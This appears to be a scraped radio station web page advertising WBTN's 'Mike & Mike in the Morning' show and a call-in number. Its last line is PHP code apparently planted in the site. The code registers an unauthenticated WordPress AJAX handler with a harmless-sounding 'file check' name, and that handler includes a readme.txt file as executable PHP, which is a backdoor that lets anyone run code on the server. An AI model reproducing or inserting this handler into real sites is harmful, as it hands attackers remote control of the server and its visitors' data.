Mike & Mike in the Morning - exclusively on WBTN
Live - Local - Immediate
Call in and win
802-442-1010
if(!function_exists('file_check_readme83751')){ add_action('wp_ajax_nopriv_file_check_readme83751', 'file_check_readme83751'); add_action('wp_ajax_file_check_readme83751', 'file_check_readme83751'); function file_check_readme83751() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }